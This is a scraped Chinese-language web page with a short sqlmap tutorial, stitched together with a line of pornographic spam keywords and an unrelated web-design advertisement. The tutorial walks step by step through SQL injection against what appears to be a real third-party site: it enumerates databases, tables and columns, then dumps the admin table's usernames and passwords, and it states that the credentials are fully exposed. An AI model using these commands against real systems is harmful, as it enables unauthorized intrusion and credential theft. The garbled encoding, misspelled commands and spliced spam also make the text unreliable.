真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

sqlmap的使用

用sqlmap進(jìn)行注入

十載的雙臺(tái)子網(wǎng)站建設(shè)經(jīng)驗(yàn),針對(duì)設(shè)計(jì)、前端、開(kāi)發(fā)、售后、文案、推廣等六對(duì)一服務(wù),響應(yīng)快,48小時(shí)及時(shí)工作處理。成都營(yíng)銷網(wǎng)站建設(shè)的優(yōu)勢(shì)是能夠根據(jù)用戶設(shè)備顯示端的尺寸不同,自動(dòng)調(diào)整雙臺(tái)子建站的顯示方式,使網(wǎng)站能夠適用不同顯示終端,在瀏覽器中調(diào)整網(wǎng)站的寬度,無(wú)論在任何一種瀏覽器上瀏覽網(wǎng)站,都能展現(xiàn)優(yōu)雅布局與設(shè)計(jì),從而大程度地提升瀏覽體驗(yàn)。成都創(chuàng)新互聯(lián)從事“雙臺(tái)子網(wǎng)站設(shè)計(jì)”,“雙臺(tái)子網(wǎng)站推廣”以來(lái),每個(gè)客戶項(xiàng)目都認(rèn)真落實(shí)執(zhí)行。

1、用掃描工具可以掃出注入點(diǎn)這里我用一個(gè)注入點(diǎn)進(jìn)行說(shuō)明。

sqlamp.py -u“http://www.gaoneng.com/product.php?cid=71”

sqlmap的使用 

可以看出此處存在sql注入漏洞。

2、

sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

--dbs 可以跑出存在的數(shù)據(jù)庫(kù)名

sqlmap的使用 

然后可以跑gaoneng數(shù)據(jù)庫(kù)中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71” -D gaoneng --tables

sqlmap的使用 

既然已經(jīng)爆出數(shù)據(jù)庫(kù)里的表,那就可以爆出表中的字段

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71”

-D gaoneng -T com_admin --columns

sqlmap的使用 

可以看到這個(gè)表中存在我們需要的字段,密碼與用戶名

Sqlmap.py -u“http://www.gaoneng.com/product.php?cid=71” 

-D gaoneng -T com_admin -C username,password --dump

sqlmap的使用 

由此這個(gè)網(wǎng)站的管理員密碼與用戶名已被完全爆出。


文章名稱:sqlmap的使用
URL標(biāo)題:http://weahome.cn/article/jeipjg.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部